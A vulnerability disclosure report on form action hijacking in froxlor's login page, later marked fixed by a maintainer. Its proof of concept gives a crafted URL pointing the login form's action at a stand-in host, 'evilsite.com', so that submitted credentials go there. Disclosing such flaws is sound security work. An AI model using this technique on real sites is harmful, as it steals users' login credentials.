External Control of File Name or Path in froxlor/froxlor

Valid

Reported on

Aug 25th 2021

✍️ Description

The login form POST request can be hijacked so that the credentials will be sent to an external website, by modifying the login page URL.

🕵️‍♂️ Proof of Concept

Change the login page URL to

https://mydomain.com/index.php/evilsite.com

Then the form action in the webpage will be changed to

<section class="loginsec">
            <form method="post" action="evilsite.com" enctype="application/x-www-form-urlencoded">
                <input type="hidden" name="script" value="" />
                <input type="hidden" name="qrystr" value="" />

💥 Impact

Form action hijacking vulnerabilities arise when an application places user-supplied input into the action URL of an HTML form. An attacker can use this vulnerability to construct a URL that, if visited by another application user, will modify the action URL of a form to point to the attacker's server. If a user submits the form then its contents, including any input from the victim user, will be delivered directly to the attacker.

Occurrences

index.php L1

References

Description: Form action hijacking (reflected)

We have contacted a member of the froxlor team and are waiting to hear back 2 years ago

A froxlor/froxlor maintainer marked this as fixed with commit 5d375b 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation

We have contacted a member of the froxlor team and are waiting to hear back 2 years ago

A froxlor/froxlor maintainer marked this as fixed with commit 5d375b 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation